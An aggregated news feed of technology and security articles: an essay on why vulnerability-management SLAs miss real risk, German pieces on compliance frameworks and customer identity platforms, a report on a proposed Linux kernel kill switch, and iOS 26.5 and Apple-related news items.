This is the part of vulnerability management nobody wants to say out loud: we have built an entire governance industry around measuring the wrong thing. SLAs tell you how disciplined your ticketing process is. They tell you almost nothing about your actual risk.
The compliance trap
I’ve watched this pattern play out across enough programs to be confident it’s not an outlier. An organization commits to a thirty-day SLA for critical vulnerabilities. The vulnerability management team gets measured on that SLA. So, they get very, very good at hitting it — for the vulnerabilities that are easy to hit it on.
What gets closed fast: anything an agent can patch remotely. Anything in a containerized workload that rebuilds nightly. Anything where the vendor has already shipped a clean update and the change advisory board will approve it without debate.
What doesn’t get closed: the legacy ERP module that can’t be patched without breaking three downstream integrations. The embedded system in the warehouse that runs an operating system whose vendor went out of business in 2019. The Windows 2000 server under the sysadmin’s desk who’s been at the company since 1995. The misconfiguration in the core identity provider that, if changed, would lock out a business unit for a day while someone rebuilds their SSO flow. The architectural flaw in the authentication layer that’s technically a CVSS 7 but practically an existential exposure because it sits in front of the crown jewels.
Those don’t move. They get relegated to the Island of Misfit Risks — exception queues, risk-accepted trackers, or the backlog of whatever team has owned the system or function since 2017. And the SLA report stays green because the denominator is dominated by the easy stuff, and the business has “accepted the risk.”
I’ve been the person who had to explain to a board that our SLA compliance was ninety-four percent and our biggest single point of failure was in the six percent. It is not a fun conversation. It is, however, the correct one. And the reason it almost never happens is because the entire reporting apparatus is structured to make it invisible.
SLAs measure discipline, not risk
Here’s the mental model I’ve been pushing with my peers. Think of patching SLAs the way you think of fire drills. Fire drills are necessary. They prove that, on a predictable cadence, your organization can execute a known procedure. No one in charge of a building full of people would claim that a successful fire drill means the building is safe. They would tell you the building is safe when the sprinklers, the structural design, the exits and the materials all hold up to a scenario you didn’t script.
Patching SLAs are fire drills. They prove your program can execute a known procedure on a predictable cadence. They do not tell you whether you’re protected against the scenario you didn’t script — the chained exploit path, the misconfigured trust boundary, the control that looks present in the GRC tool but has been silently failing for eight months, or my favorite, “that control works for everywhere except XYZ business unit.”
When I ask a CISO how much cyber risk they have, they struggle to articulate it. They talk about the attack surface, the number of vulnerabilities, an audit score. Rarely do I hear them say something like, “We have $252M in cyber risk.” What if we as CISOs could articulate how much risk we have in terms of dollars and finally be able to build a business case for solving those hard vulnerabilities, misconfigurations and control breakdowns instead of trying to sell fear, uncertainty and doubt?
That question has an answer, and it’s one the FAIR Institute has been formalizing for years: cyber risk quantification, or CRQ. I’m not here to evangelize a methodology. There are several — some more defensible than others — and the specific choice matters less than the discipline of forcing vulnerabilities, misconfigurations and control gaps into loss-exposure terms rather than severity labels. When I tell a CFO that an unpatched CVSS 9.8 exists on a server, their eyes glaze over. When I tell them we have an estimated twelve-million-dollar annualized loss exposure concentrated in one unremediated architectural flaw, we have a very different conversation — and, in my experience, a very different remediation budget.
Three shifts that actually move the needle
If you’re a security leader trying to pull your program out of SLA theater and into something that reflects real risk, here’s what I’ve seen work.
Treat the SLA as the floor of what’s required, not the ceiling of what’s reported. Continue to meet your contractual and regulatory SLA commitments — they exist for good reasons and customers ask about them. But stop presenting SLA compliance as the headline metric of your vulnerability management program. It’s a hygiene measure. Put it on a hygiene slide. The headline metric should be the trend of your quantified residual risk; broken out by the business services it threatens. Make your exception process produce better decisions, not just documented ones. In most of the programs I’ve reviewed, the risk acceptance process is a filing exercise with risks living on the register for years. Someone signs a form, the ticket gets closed as “risk accepted,” and the exposure disappears from the SLA report until the exception expires in the GRC tool next year. That’s not risk management. That’s paperwork. A functional exception process requires the business owner to see the quantified loss exposure they’re accepting, agree to revisit it on a defined cadence and — for the biggest exposures — commit to a remediation plan with a funded timeline. Research from Verizon’s 2025 DBIR found that among the edge device vulnerabilities featured in the report, the average time to patch was 209 days while attackers’ median time-to-exploitation was five days — a gap that exists because the fixes live where change is hardest. That same pattern shows up in CISA’s Known Exploited Vulnerabilities catalog, populated largely with CVEs that had patches available long before they were used in the wild. That isn’t a patching problem. That’s an exception-hygiene problem. Fund remediation the way you fund other capital and opex projects. The hard vulnerabilities — the ones that require re-architecting a service, replacing an end-of-life platform or rebuilding an identity flow — aren’t going to get solved out of the quarterly operational budget. They require capital and opex investment, and they compete with every other business investment. Quantified risk is what lets you compete on equal terms. “We need to rebuild the authentication layer because it’s old and unsupported” will lose that fight eight out of 10 times. “We need to rebuild the authentication layer because it represents a $10M cyber risk exposure, and a $1M investment to remediate will reduce our cyber risk by a net of $9M” wins it often enough to matter. One final note, because I get this question every time I talk about CRQ with a skeptical audience. Your loss-exposure estimates are going to be imprecise. The inputs are uncertain, the ranges are wide and any honest quantification exercise produces results that could be picked apart by a determined critic. That’s fine. A CFO or an actuary can argue the number is $8M rather than $10M — still fine. At least you have a number people can anchor to, versus the old patching scorecard that said everything was rainbows and unicorns.
A green SLA dashboard tells an executive that their security team is disciplined. A quantified risk picture tells them where their actual exposure is and what it would cost to reduce it. One of those conversations gets the hard stuff fixed. The other one gets it documented and forgotten.
SLAs are the floor. If that’s all you’re standing on, you’re closer to the ground than you think.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
The United States Mint today began selling a new $1 American Innovation Coin featuring Steve Jobs, purchasable from the U.S. Mint website.


The $1 Steve Jobs Coin features a young Steve Jobs in a turtleneck, jeans, and sneakers, sitting in front of the Northern California landscape. Jobs is said to be "captured in a moment of reflection," in which "his posture and expression reflect how this environment inspired his vision to transform complex technology into something as intuitive and organic as nature itself."

According to the Steve Jobs Archive, which championed the design with support from California governor Gavin Newsom, Jobs "felt a deep sense of connection to and gratitude for California's natural beauty."
The collectible coins are available as a roll of 25 for $61, or $2.44 each. A bag of 100 coins costs $154.50.

The American Innovation $1 Coin Program was launched by the U.S. Mint in 2018, honoring groundbreaking innovations and innovators from every U.S. state, territory, and the District of Columbia.Tags: California, Steve Jobs
This article, "Steve Jobs U.S. Commemorative $1 Coin Goes on Sale" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
American educational technology company Instructure, the parent company of Canvas, said it reached an "agreement" with a decentralized cybercrime extortion group after it breached its network and threatened to leak stolen information from thousands of schools and universities. In an update shared on Monday, the Utah-based firm said it "reached an agreement with the unauthorized actor involved inView the full article
OpenAI has launched Daybreak, a new cybersecurity initiative that brings together frontier artificial intelligence (AI) model capabilities and Codex Security to help organizations identify and patch vulnerabilities before attackers find a way in using the same issues. "Daybreak combines the intelligence of OpenAI models, the extensibility of Codex as an agentic harness, and our partners acrossView the full article
Apple on Monday officially released iOS 26.5 with support for end-to-end encryption (E2EE) to Rich Communication Services (RCS) in beta as part of a "cross-industry effort" to replace traditional SMS with a more secure alternative. To that end, E2EE RCS messaging is rolling out to iPhone users running iOS 26.5 with supported carriers and Android users on the latest version of Google Messages.View the full article
Mit der Zunahme von Cyberbedrohungen steigt auch die Zahl der Compliance-Rahmenwerke. So können CISOs diese Herausforderung bewältigen.
Foto: Dapitart – shutterstock.com
Die Anforderungen von Cybersicherheitsvorschriften können je nach Unternehmensgröße, Region, Branche, Datensensibilität und Programmreifegrad sehr unterschiedlich sein. Ein börsennotiertes Unternehmen hat beispielsweise keine andere Wahl, als mehrere Vorschriften einzuhalten sowie Risikobewertungen und Pläne für Abhilfemaßnahmen zu erstellen. Regierungsbehörden oder Unternehmen, die an Regierungsbehörden verkaufen, müssen bestimmte Compliance-Anforderungen des öffentlichen Sektors erfüllen. Banken, Organisationen des Gesundheitswesens, Infrastrukturunternehmen, E-Commerce-Firmen und andere Unternehmen haben jeweils eigene branchenspezifische Compliance-Regeln zu befolgen.
Sicherheit ist nicht gleich Compliance
Auch für Unternehmen, die nicht in eine dieser Kategorien fallen, kann es Gründe geben, warum sie bewährte Sicherheitspraktiken nachweisen müssen, zum Beispiel, wenn sie eine SOC-Zertifizierung anstreben oder eine Cyberversicherung beantragen. Umfassende Rahmenwerke für die Einhaltung von Cybersicherheitsvorschriften wie NIS-2 und ISO bieten allen Unternehmen Leitlinien, die sie befolgen können, sowie Strukturen für die Kommunikation der Ergebnisse.
Aber: Nur, weil man die Vorschriften einhält, heißt das noch lange nicht, dass man auch sicher ist. Erfahrene Sicherheitsexperten betrachten die Einhaltung von Vorschriften als das absolute Minimum und gehen in ihren Empfehlungen weit über die erforderlichen Komponenten zum Schutz ihrer Unternehmen hinaus.
Einhaltung der Vorschriften als Voraussetzung für Geschäftstätigkeit
Ein Sicherheitsmanager kann zwar Investitionen und Praktiken für die Cybersicherheit empfehlen, um die Compliance-Anforderungen zu erfüllen, aber er ist nicht der letzte Entscheidungsträger. Eine wichtige Aufgabe des CISO besteht daher darin, das Risiko der Nichteinhaltung von Vorschriften zu kommunizieren und gemeinsam mit anderen Unternehmensleitern zu entscheiden, welche Initiativen Vorrang haben sollen. Das Risiko umfasst in diesem Zusammenhang nicht nur das technische, sondern auch das Geschäftsrisiko. Um Reibungsverluste zu vermeiden, ist es daher sinnvoll, den Mitarbeitern auch den geschäftlichen Nutzen einer konformen Cybersicherheit aufzuzeigen.
Kosten-Nutzen-Abwägung
Die Unternehmensführung muss dabei die Kosten und den Nutzen der Einhaltung von Vorschriften gegen die potenziellen Kosten der Nichteinhaltung abwägen. Angenommen ein Unternehmen erfüllt eine Best Practice für die Verwaltung von Berechtigungen nicht vollständig: Bei Nichteinhaltung der Vorschriften können die zugrunde liegenden Schwachstellen neben möglichen Klagen von Anteilseignern noch größere Auswirkungen auf das Unternehmen haben, einschließlich Ausfallzeiten, Ransomware-Zahlungen und Umsatzeinbußen. Die Erfüllung der Compliance-Anforderungen könnte hingegen einen geschäftlichen Nutzen bringen, beispielsweise durch schnellere Verkäufe, stärkere Partnerschaften oder niedrigere Cyberversicherungsraten.
Wie CISOs Compliance-Rahmenwerke nutzen können
CISOs können vorhandene Compliance-Frameworks als Methodik für Techniken und Prozesse verwenden, um sie in ihr Cybersicherheitsprogramm einzubauen. Zu ihren Aufgaben gehört es im Wesentlichen, über die Programmprioritäten zu informieren und eine “Einkaufsliste” für Lösungen zu erstellen, die sie unbedingt benötigen und die mit dem Programm, das sie aufbauen wollen, übereinstimmen.
Aber es gibt auch einen Unterschied zwischen der Verwendung eines Compliance-Rahmenwerkes zur Steuerung eines fundierten Risikomanagements und der exakten Einhaltung von Vorschriften. Hier gilt es einen Balanceakt zu meistern und fallweise auch risikobasierte Entscheidungen zu treffen.
CISOs brauchen Partner bei der Einhaltung von Vorschriften
CISOs sitzen bei der Einhaltung von Vorschriften nicht allein im Boot. Sie müssen Partnerschaften mit Rechtsteams, Datenschutzbeauftragten und Prüfungs- oder Risikoausschüssen aufbauen, um die sich ändernden Compliance-Anforderungen zu verstehen und zu entscheiden, wie sie zu erfüllen sind.
Manchmal verlangen diese internen Partner von den Sicherheitsteams, dass sie stärkere Kontrollen einführen, aber sie können auch auf die Bremse treten. So würden manche CISOs gerne das Verhalten ihrer Mitarbeiter detailliert überwachen, aber die Datenschutzgesetze verbieten dies und die Rechtsabteilung sorgt dafür, dass diese Gesetze eingehalten werden.
Compliance-Teams erledigen viele Dinge für die Sicherheitsingenieure und -analysten, die weder die Zeit noch die Ressourcen dafür haben. Sie nehmen die Sicherheit in die Pflicht und überprüfen, ob die Kontrollen wie erwartet funktionieren. Sie fungieren quasi als Vermittler zwischen Sicherheitsteams, Aufsichtsbehörden und Prüfern, um die Einhaltung der Vorschriften nachzuweisen, sei es durch das Sammeln von Beweisen mittels manueller Sicherheitsfragebögen oder durch Technologieintegrationen.
Für eine Zertifizierung im öffentlichen Sektor müssen beispielsweise die Sicherheitskontrollen überwacht, protokolliert und die Daten mindestens sechs Monate lang aufbewahrt werden, um nachzuweisen, dass alle Vorgaben erfüllt wurden.
Lesetipp: Wie internationale Security Frameworks CISOs unterstützen
Tools und Ressourcen zur Unterstützung der Einhaltung von Vorschriften
Risikoregister sind hilfreich, um alle Beteiligten an einen Tisch zu bringen, indem sie alle Risiken dokumentieren und nach Prioritäten ordnen. Wenn alle Beteiligten die gleichen Informationen einsehen, können sie sich auf geeignete Maßnahmen einigen. Im Rahmen eines Risikomanagementprogramms werden Richtlinien, Standards und Verfahren regelmäßig überprüft und alle Änderungen vor ihrer Umsetzung genehmigt.
Mithilfe von Tools wie Governance, Risk, and Compliance (GRC)-Systemen und kontinuierlicher Überwachung der Einhaltung von Vorschriften wie NIS-2 und ISO können Unternehmen laufende Sicherheitsaktivitäten verfolgen und die Ergebnisse melden. GRC-Systeme lassen sich mit SIEM-Lösungen verknüpfen, um Protokolle zu sammeln, durch die Kombination mit Schwachstellen-Scannern kann man nachzuweisen, dass Prüfungen durchgeführt wurden.
Zusätzlich zu solchen Instrumenten verlassen sich viele Unternehmen auf Dritte, um die Einhaltung der Vorschriften zu bewerten. Diese können vor einer externen Prüfung ein internes Compliance-Audit durchführen, um sicherzustellen, dass es keine Überraschungen gibt, wenn die Aufsichtsbehörden vorbeikommen.
Einmal erfüllen, auf viele anwenden
Die meisten Unternehmen haben zahlreiche Compliance-Stellen, denen sie Rechenschaft ablegen müssen, sowie Cyberversicherungsanbieter, Kunden und Partner. Die Einhaltung von Vorschriften kann zwar eine Belastung sein, aber es gibt Techniken, um den Bewertungsprozess zu rationalisieren. Immerhin ist ein Großteil der gesetzlichen Anforderungen beinahe identisch. Orientieren sich CISOs beispielsweise an einem Rahmenwerk wie NIST, können sie überall die gleichen Verfahren anwenden. So sind zum Beispiel Anforderungen an das Privileged Access Management (PAM) wie Passwortmanagement, Multi-Faktor-Authentifizierung (MFA) und rollenbasierte Zugriffskontrollen in allen Compliance-Frameworks zu finden.
Ausblick
Letztlich ist die Einhaltung von Vorschriften ein fließender Bereich mit Anforderungen, die sich weiterentwickeln, um den sich ändernden Risikomustern und Geschäftsbedingungen Rechnung zu tragen. Es ist zu erwarten, dass die Sicherstellung der Compliance in Zukunft einen noch größeren Teil der Arbeit von CISOs ausmachen wird. Da die Branche mit immer größeren Bedrohungen konfrontiert ist, ist die Einhaltung von Vorschriften ein wichtiger Bestandteil eines strategischen und umfassenden Ansatzes für das Management von Cybersicherheitsrisiken. (jm)
Lesetipp: Das fordert das neue KRITIS-Dachgesetz
View the full article
Jackie Niam | shutterstock.com
Customer Identity & Access Management (CIAM) bildet eine Unterkategorie von Identity & Access Management (IAM). CIAM wird dazu eingesetzt, die Authentifizierungs- und Autorisierungsprozesse von Applikationen zu managen, die öffentlich zugänglich sind, beziehungsweise von Kunden bedient werden.
Geht es darum, die für Ihr Unternehmen passende CIAM-Lösung zu ermitteln, gilt es, die Benutzerfreundlichkeit mit einer langen Liste von Geschäftszielen und -anforderungen ins Gleichgewicht zu bringen:
Marketingverantwortliche wollen Daten über Kunden und deren Geräte sammeln.
Datenschutzbeauftragte wollen sicherstellen, dass alle Prozesse mit den Datenschutzbestimmungen in Einklang stehen.
Security- und Risiko-Entscheider wollen die Integrität der Konten sicherstellen und die betrügerische Nutzung von Anmeldedaten so weit wie möglich verhindern.
Um Sie bei diesem heiklen Balanceakt zu unterstützen, haben wir die derzeit besten Lösungen, die der Markt für Customer Identity & Access Management zu bieten hat, für Sie zusammengestellt.
Empfehlenswerte Customer Identity & Access Management Tools
Die folgenden CIAM-Plattformen und -Lösungen werden von Analysten und Kunden aufgrund ihres Funktionsumfangs, ihrer Erweiterbarkeit und ihrer Benutzerfreundlichkeit bevorzugt.
IBM Security Verify
Im Enterprise-Bereich erhält IBMs Security Verify gute Noten für seine robuste Infrastruktur, die durch eine containersierte Multi-Cloud-Architektur gestützt wird. Diese ist nicht nur skalierbar, sondern bietet Unternehmen auch die Möglichkeit, isolierte Kundeninstanzen zu managen. Dabei bietet die IBM-Lösung Support für eine Vielzahl von Authentifizierungsstandards, inklusive FIDO 2 Server-Zertifizierung. Um Marketing-Analysen oder BI-Funktionen zu integrieren, können die Kunden entweder das IBM-eigene Ökosystem oder Drittanbieter über ein ausgedehntes Konnektoren-Portfolio ins Boot holen.
Ein wichtiges Alleinstellungsmerkmal des IBM-Produkts: Während viele andere CIAM-Produkte in Sachen risikobasierte Authentifizierung und Betrugsbekämpfung nur Integrationsoptionen anbieten können, bringt Security Verify diese Funktionen nativ mit: Die “Trusteer”-Funktionen nutzen Analysefunktionen, um Betrug mit Hilfe von KI-gestütztem, adaptivem Zugriff zu reduzieren. Das System nutzt eine Kombination aus Anomalieerkennung, Erkennung von Betrugsmustern und anderen passiven Verhaltensanalysen, um die Vertrauenswürdigkeit eines Kontos zu bewerten und die Authentifizierungsanforderungen entsprechend anzupassen.
Darüber hinaus bietet die IBM-Lösung auch ein Self-Service-Portal für die Benutzer, um Einwilligungen zu managen sowie eine Low-Code/No-Code-Management-Funktion, die Datenschutzbeauftrage und Business-Entscheidern ermöglicht, Datenschutzrichtlinien und -anforderungen ohne die Hilfe von Softwareentwicklern festzulegen und zu optimieren.
LoginRadius
Wenn Sie in Sachen CIAM eine schlüsselfertige Lösung suchen, die für ihre einfache Implementierung und Bedienung bekannt ist, sollten Sie einen Blick auf das Angebot von LoginRadius werfen: Sie bringt umfassenden API-Support mit und lässt sich in vielfacher Hinsicht an ihre Bedürfnisse anpassen. Allerdings handelt es sich hierbei nicht um eine Plattform, die für umfangreiche Code-Anpassungen unter der Haube gedacht ist. Vielmehr adressiert sie als No-Code-Lösung Unternehmen, die wenig bis gar keine Entwicklungsarbeit leisten wollen oder können.
Onboarding-Workflows werden über eine grafische Benutzeroberfläche abgewickelt, Richtlinien über Dropdown-Listen erstellt. Zu Integrationszwecken steht ein Marktplatz mit vordefinierten Konnektoren zur Verfügung. Darüber hinaus enthält die CIAM-Plattform auch eine integrierte Analyse-Engine mit Dutzenden von Reportings für Marketing- und Identitätsanalysen. Um Datenschutz- und Compliance-Anforderungen gerecht zu werden, stehen grundlegende Consent-Management- und Self-Service-Funktionen zur Verfügung – zudem wird etwa Social Login unterstützt.
Für die einfache Bedienung und die Deployment-Vorzüge opfern Unternehmen ein gewisses Maß an Kontrolle: So verfügt das Tool zwar über eine Authentifizierungs-Risiko-Engine, bietet aber nur wenig Kontrolle über dessen Priorisierung. Für Betrugserkennungs-Funktionen von Drittanbietern stehen nicht besonders viele Konnektoren zur Verfügung und Geräteattribute werden für Risikobewertungen und -analysen zwar untersucht, allerdings nur in begrenztem Umfang.
Microsoft Entra
Microsoft ist zwar ein wichtiger Akteur auf dem breiteren IAM-Markt, arbeitet sich in Sachen CIAM aber immer noch auf der Reifegradskala nach oben. Im Rahmen ihrer letzten großen Access-Management-Analyse argumentierten die Marktforscher von Gartner, die CIAM-Funktionen von Azure AD seien im Vergleich zu den Konkurrenzangeboten unausgereift, weswegen die meisten Kunden das Produkt nur für Workforce-Szenarien verwendeten. Seitdem ist allerdings viel passiert: Microsoft hat mit Nachdruck in sein gesamtes Identity-Portfolio investiert und sich mit einer neuen Produktlinie namens Entra positioniert. Diese umfasst nun das komplette Azure-AD-Paket, inklusive der CIAM-Funktionalitäten von Azure AD External Identities – zudem wurde auch die Open-Standard-Plattform Verified ID in den Mix aufgenommen. Microsoft setzt auf dieses dezentrale Identitätsnachweis-Ökosystem in erster Linie für Mitarbeiterszenarien und setzt damit einen langfristigen strategischen Schwerpunkt, der sich vermutlich auch auf externe Anwendungsfälle erstrecken wird.
Trotz einiger großer Funktionslücken – etwa fehlende Consumer Privacy Dashboards oder der eher rudimentären Adaptive-Authentication-Policy-Konstruktion – hat Azure AD External Identities Vorteile: Es ist extrem skalierbar, einfach zu bedienen und verfügt über einige starke Account-Takeover-Schutzmechanismen. Zudem lässt es sich gut mit Microsofts BI- und CRM-Plattformen für erweiterte Analysen integrieren und bietet ein kontinuierlich wachsendes Integrations-Ökosystem.
Okta / Auth0
Nach der Übernahme von Auth0 will Okta das CIAM-Produkt von Auth0 als eigenständiges Angebot neben den hauseigenen CIAM-Funktionen beibehalten, um Kunden maximale Flexibilität bei der Implementierung zu bieten. Nichtsdestotrotz wird es zu Überschneidungen und Integrationen kommen – Okta hat bereits mehrere Funktionen kombiniert, um die Fähigkeit zu Zusammenarbeit und Innovation zu beschleunigen.
Auth0 bietet zwar einige Workforce-IAM-Funktionen an, aber diese Plattform ist mit CIAM-Anwendungsfällen groß geworden – entsprechend stark ausgeprägt ist der Fokus auf diesen Bereich. Laut den Analysten von Gartner eignet sich die CIAM-Lösung von Auth0 vor allem dann, wenn Entwickler Access Management für Verbraucher in individuell entwickelte, API-lastige Anwendungen einbauen müssen. Dazu kombiniert die Plattform “großartige UX-Flows und UI-Anpassungsfähigkeiten” mit “umfassenden Entwickler-Tools und vollständiger API-Unterstützung”, heißt es in Gartners Magic Quadrant.
Das gesamte Okta-CIAM-Portfolio verfügt über eine Reihe von Konnektoren für Business Intelligence, CRM, Marketing-Analytics und -Automatisierung, andere IAM-Plattformen, beliebte SaaS-Anwendungen und Plattformen zur Betrugsbekämpfung. Raum nach oben gibt es bei diesem Produkt, wenn es darum geht, Geräteintelligenz und Verhaltensbiometrie in die nativen Funktionen der Plattform zu integrieren.
OneLogin
Der Identity-as-a-Service (IdaaS)-Anbieter OneLogin gehört in Gartners Magic Quadrant für Access Management zur Spitzengruppe und bietet einige abgespeckte, entwicklerfreundliche CIAM-Funktionen. Die könnten speziell für Unternehmen, die eine erschwingliche Option für den Aufbau einer stärkeren Kundenauthentifizierung suchen, hilfreich sein. Laut Gartner liegt die Stärke von OneLogin auch in den erschwinglichen Preisen, die das Unternehmen für externe Zugriffsmanagement-Anwendungen aufruft.
Die Lösung selbst zeichnet sich dabei durch seine flexible Erweiterbarkeit mit umfangreicher Entwicklerunterstützung und seine robusten APIs aus. Die Serverless Smart-Hooks-API-Funktion soll Entwickler dabei unterstützen, CIAM-Workflows und -Richtlinien anzupassen, um möglichst nahtlose und sichere Benutzererfahrungen während der Anmeldung zu gewährleisten. Entlastung gibt es auch, wenn es um Single-Sign-On geht – auch hier unterstützt das Tool dabei, entsprechende Funktionen in Consumer-Apps einzubauen.
Im Gegensatz zu vielen anderen CIAM-Lösungen in dieser Übersicht, gehören allerdings keine Out-of-the-Box-Funktionen für Consent Management oder geschäftsorientierte Funktionen wie Marketing-Analysen und Automatisierung zum Paket – es handelt sich in erster Linie um eine Authentifizierungs- und Autorisierungslösung.
Nach der Übernahme durch One Identity war erwartet worden, dass sich das Portfolio stärker in Richtung Workforce IAM entwickeln wird. Davon ist ein Jahr später allerdings noch nichts zu sehen.
Ping Identity
Ping Identity ist einer der ersten Enterprise-IAM-Anbieter, der in CIAM-Gewässer abtaucht. Dabei überzeugt er vor allem in Sachen Identitäsnachweise, -orchestrierung und Analytics-Funktionen – auch der Umfang der unterstützten Authentifikatoren sowie die Dokumentation und Sicherheit der API-Konnektoren sind positiv hervorzuheben. Ein “Fraud”-Modul spürt darüber hinaus mit Hilfe von Echtzeit-Verhaltensnavigation, Verhaltensbiometrie, Geräte- und Netzwerkattributen potenzielle, betrügerische Angriffe auf. Auch die Integration mit externen Betrugserkennungs-Plattformen ist möglich. Ping Identity hebt sich von anderen Anbietern zudem dadurch ab, dass es den FIDO-2-Standard nicht nur unterstützt, sondern einen entsprechend zertifizierten Server betreibt.
Die Analysten von KuppingerCole sehen auch Schwachpunkte, etwa die nur rudimentäre Verwaltung von Berechtigungen für Verbraucher, die in den meisten Fällen zusätzliche Entwicklungs- und Integrationsarbeit erfordern. Auch die noch in der Entwicklung befindlichen Out-of-the-Box-Konnektoren für erweiterte Business Intelligence, Customer Relationship Management und Marketing-Analytics bemängeln die Analysten – bewerten das Ping-Identity-Offering aber dennoch sehr positiv. Laut Gartner gehört Ping Identity zu den “erschwinglicheren Optionen auf dem CIAM-Markt”.
Im August 2023 übernahm der Ping-Identity-Mutterkonzern Thoma Bravo den Sicherheitsanbieter Forge Rock – und integrierte dessen Potfolio in Ping Identity. (fm)
Dieser Artikel ist im Original bei unserer Schwesterpublikation CSOonline.com erschienen.
View the full article
Linux server admins may get the ability to turn off a vulnerable function in the OS kernel until a patch for a zero-day vulnerability is ready, if a proposal from a kernel developer and maintainer is accepted by the open source community.
The idea of a kill switch for privileged operators has been suggested by Sasha Levin, a distinguished engineer at Nvidia and co-maintainer of the long-term support and stable Linux kernel trees, as a mitigation when a security hole is discovered.
As he pointed out in a recent post, when a vulnerability is found, “fleets stay exposed until a patched kernel is built, distributed and rebooted into. For many such issues, the simplest mitigation is to stop calling the buggy function.” In his post, Levin and a colleague also provided a proposed version of a kernel kill switch.
“For most users,” Levin pointed out, “the cost of ‘this socket family stops working for the day’ is much smaller than the cost of running a known vulnerable kernel until the fix lands.”
The proposal comes at a time when several high severity Linux vulnerabilities have been discovered, including Copy Fail (CVE-2026-31431), a logic bug which lets users easily obtain root access, and Dirty Frag, which abuses weaknesses in how the Linux kernel handles fragmented memory pages. The Dirty Frag attack combines two separate vulnerabilities affecting the Linux IPsec Encapsulating Security Payload (ESP) subsystem (CVE-2026-43284) and the RxRPC networking protocol (CVE-2026-43500).
Security forum users opposed
The proposal has set off a furious debate among infosec pros. For example, in the r/cybersecurity Reddit forum, it’s been called a “terrible idea,” “ridiculous,” “absolutely terrifying,” and “just too risky.”
“People will use a kill switch instead of patching,” argued a contributor.
“If you know how Linux works, you don’t need it,” added another contributor, who said that within a couple of hours of the release of the Dirty Drag exploit, he had the code analyzed and mitigations ready. “If you don’t know how Linux works,” he added, “you shouldn’t use any kill switch.”
Linux and security experts are cautious.
“[A kill switch is] nice in theory, but I don’t think it accelerates my movement to protection any faster than what we deal with today, considering change control must still be carefully tested and managed,” Kellman Meghu, chief technology officer at Canadian-based incident response firm DeepCove CyberSecurity, told CSO.
“It is easy for a developer to say ‘Just unload that kernel module,’ but the harder part is attesting to the business there is no impact to the services, at which point I am asking why this module was loaded at all if it was never needed? That sounds like a gap in my hardening and build process,” he said.
Meghu foresees at least two problems with a kill switch: First, few admins are be able to easily assess its impact on their organization’s services. A kill switch would easily work for the Copy Fail hole, he said, “but as a strategy for all potential risks? What will be the change impact of disabling kernel functions? It would need to be tested and validated, and that still takes time and effort to truly validate outside of production.”
Second, he said, just triggering the kill switch and hoping is not a great strategy for enterprise supported applications.
The Copy Fail hole isn’t typical of all issues Linux pros face, Meghu added. In short, he said, the kill switch “seems like a Band-Aid that only works on certain cuts.”
Robert Enderle of the Enderle Group said the kill switch proposal is a classic ‘break-glass-in-case-of-emergency’ tool. He said, “For enterprise admins, it’s a highly pragmatic response to the lag between a zero-day disclosure and a deployed patch. In high-availability environments where rebooting a fleet is a nightmare, being able to kill a specific, non-essential function (like an obscure networking protocol) that’s currently being exploited is a huge win. It basically trades a niche feature for immediate system integrity without the downtime of a full patch cycle.”
 However, he added, that power would be a double-edged sword. “While it doesn’t create a new entry point — you still need root access to pull the trigger — it opens the door for massive self-inflicted Denial of Service. There’s no safety net; if an admin kills a critical memory management function by mistake, the system is toast.”
He pointed out that it also risks becoming a crutch that lets organizations delay actual patching. “It’s a sharp tool that belongs in the hands of sophisticated security teams, but for the average sysadmin, it’s probably a bit too ‘nuclear’ for comfort,” he said. “Given how IT is staffed these days, this is likely way too dangerous for most to consider using.” 
But an official at Linux distributor Red Hat said the company thinks it will work.
“We’re supportive of incorporating kill switch capabilities into the kernel, especially as the pace and severity of exploits expand due to LLM-driven scanning,” Mike McGrath, vice president for core platforms at Red Hat, told CSO. “Patches are absolutely critical to address CVEs, but they’re also frequently disruptive. Most organizations operating at scale must weigh patch-based protection against the production impact of restarts and updates. This means that non-disruptive mitigations, which Red Hat frequently provides through all available means, are vital for ‘in the moment’ protection until a permanent patch can be verified and deployed.”

View the full article
Apple released iOS 26.5 after a few months of beta testing, and while it doesn't have the Siri features we were hoping for since those are being held until iOS 27, there are a handful of useful changes worth knowing about.


End-to-End Encryption for RCS

Support for end-to-end encryption (E2EE) for RCS messages between iPhone and Android devices is included in iOS 26.5, which means texts you send your Android friends can now have the same security as iMessages exchanged with another iPhone user.


Encrypted ‌RCS‌ messages are available on supported carriers and will roll out over time, and for conversations to be encrypted, both the receiver and the sender must use a carrier that supports the latest version of ‌RCS‌.

End-to-end encryption is on by default, and there is a toggle for it in the Messages section of the Settings app. Encrypted messages are denoted with a small lock symbol.

Wallpaper

iOS 26.5 includes a colorful new Pride Luminance wallpaper that can be customized with multiple color options.



Maps App

The Maps app includes a new Suggested Places feature that recommends places to visit based on your recent searches and what's trending nearby.


iOS 26.5 also laid the groundwork for ads in the Maps app, but ads are not live yet.

EU Changes for Third-Party Wearables

To comply with the EU's Digital Markets Act, Apple is letting third-party wearables access some features that have historically been limited to the Apple Watch and AirPods.

Here's what's new:

Proximity pairing - Third-party earbuds are able to use proximity pairing to connect to an iPhone, similar to the AirPods. Bringing a set of earbuds that support the feature near an iPhone will initiate an AirPods-like one-tap pairing process, so third-party wearables like earbuds will no longer require multiple steps to pair.
iPhone notifications - Third-party accessories like smartwatches are able to receive notifications from the iPhone, and users are able to view and react to them. Interactive notifications from the iPhone have been limited to the Apple Watch, while third-party wearables have only been able to display read-only notifications. Notifications can only be forwarded to a single connected device at a time, so turning on notifications for a third-party wearable disables notifications on Apple Watch.
Live Activities - Live Activities from the iPhone can be displayed on a third-party wearable, similar to how Live Activities are shown on an Apple Watch.

Accessory makers will need to add support for the interoperability updates, so they may not be available right away. Third-party TVs, smartwatches, and headphones will be able to use the features.

Expanded support for third-party wearables is limited to iPhone users located in the European Union with an Apple account set to an EU country or region.

Magic Accessories

When you connect an accessory like a Magic Keyboard to an iPhone over USB-C, the iPhone will automatically establish a Bluetooth connection with the accessory.

iPhone to Android Transfer

When switching from an iPhone to an Android device, there is a new setting for selecting which message attachments to transfer over. There are options for All, 1 year, or 30 days.

Apple Books

There are mentions of new awards in the Apple Books app, which are likely for
year-end wrap-ups.

Keyboard Layout

iOS 26.5 has an Inuktitut keyboard layout option.

Security Fixes

iOS 26.5 addresses more than 50 vulnerabilities, so it's a good idea to update as soon as possible to get the latest protections. None of the vulnerabilities are known to have been actively exploited.Related Roundups: iOS 26, iPadOS 26Related Forum: iOS 26
